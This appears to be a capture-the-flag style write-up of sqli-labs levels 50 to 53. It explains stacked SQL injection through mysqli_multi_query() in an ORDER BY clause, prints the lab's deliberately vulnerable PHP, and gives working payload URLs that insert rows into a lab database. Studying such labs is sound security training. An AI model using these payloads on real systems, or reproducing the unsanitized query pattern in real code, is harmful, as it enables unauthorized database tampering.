0x1 Level 50
The source code of this level uses mysqli_multi_query(), whereas the earlier levels used mysqli_query(). The difference is that mysqli_multi_query() executes every semicolon-separated statement in the string it is given, while mysqli_query() executes exactly one statement. So here we can append our own statement after the expected value and have the server run it too: this is stacked injection. Note that the injection point is an ORDER BY clause, where UNION cannot be used, but a stacked INSERT or UPDATE still works; the page only displays the result set of the first SELECT, so the appended statement's effect is confirmed by reloading the page and looking for the new row.
```php
/* $id is the raw sort parameter from the URL, spliced in unsanitized:
   anything after a ';' in it becomes a second statement */
$sql="SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
?>
<center>
<font color= "#00FF00" size="4">
<table border=1'>
<tr>
<th> ID </th>
<th> USERNAME </th>
<th> PASSWORD </th>
</tr>
</font>
</font>
<?php
    /* store first result set: only the SELECT's rows are shown,
       the stacked statement's outcome is never reported */
    if ($result = mysqli_store_result($con1))
    {
        while($row = mysqli_fetch_row($result))
        {
            echo '<font color= "#00FF11" size="3">';
            echo "<tr>";
            echo "<td>"; printf("%s", $row[0]); echo "</td>";
            echo "<td>"; printf("%s", $row[1]); echo "</td>";
            echo "<td>"; printf("%s", $row[2]); echo "</td>";
            echo "</tr>";
            echo "</font>";
        }
    }
    echo "</table>";
}
else
{
    /* MySQL errors are echoed back (this is what Less-52/53 remove) */
    echo '<font color= "#FFFF00">';
    print_r(mysqli_error($con1));
    echo "</font>";
}
}
else
{
    /* closes the surrounding check that a sort parameter was supplied (not part of this excerpt) */
    echo "Please input parameter as SORT with numeric value<br><br><br><br>";
    echo "<br><br><br>";
    echo '<img src="../images/Less-50.jpg" /><br>';
}
```
The method is the same as in Level 39.
SQL statement: $sql="SELECT * FROM users ORDER BY $id";
payload: http://192.168.232.135/sqli-labs-master/Less-50/?sort=1;insert into users values(1000,'test','test')#
0x2 Level 51
This level also uses mysqli_multi_query(); the difference is in the SQL statement: the sort value is wrapped in single quotes, so the payload has to close the quote before the semicolon, and the trailing quote is removed by the # comment.
SQL statement: $sql="SELECT * FROM users ORDER BY '$id'";
payload: http://192.168.232.135/sqli-labs-master/Less-51/?sort=1';insert into users values(2000,'test','test')#
0x3 Level 52
This level is the same as Level 50 (mysqli_multi_query() with an unquoted ORDER BY $id); the only difference is that MySQL error messages are no longer displayed. Since the stacked statement's outcome was never displayed in Level 50 either, the same payload works, and the inserted row is confirmed by reloading the page.
SQL statement: $sql="SELECT * FROM users ORDER BY $id";
payload: http://192.168.232.135/sqli-labs-master/Less-52/?sort=1;insert into users values(3000,'test','test')#
0x4 Level 53
This level is the same as Level 51 (mysqli_multi_query() with a single-quoted ORDER BY '$id'); the only difference is that MySQL error messages are no longer displayed, so the Level 51 payload is used unchanged.
SQL statement: $sql="SELECT * FROM users ORDER BY '$id'";
payload: http://192.168.232.135/sqli-labs-master/Less-53/?sort=1';insert into users values(4000,'test','test')#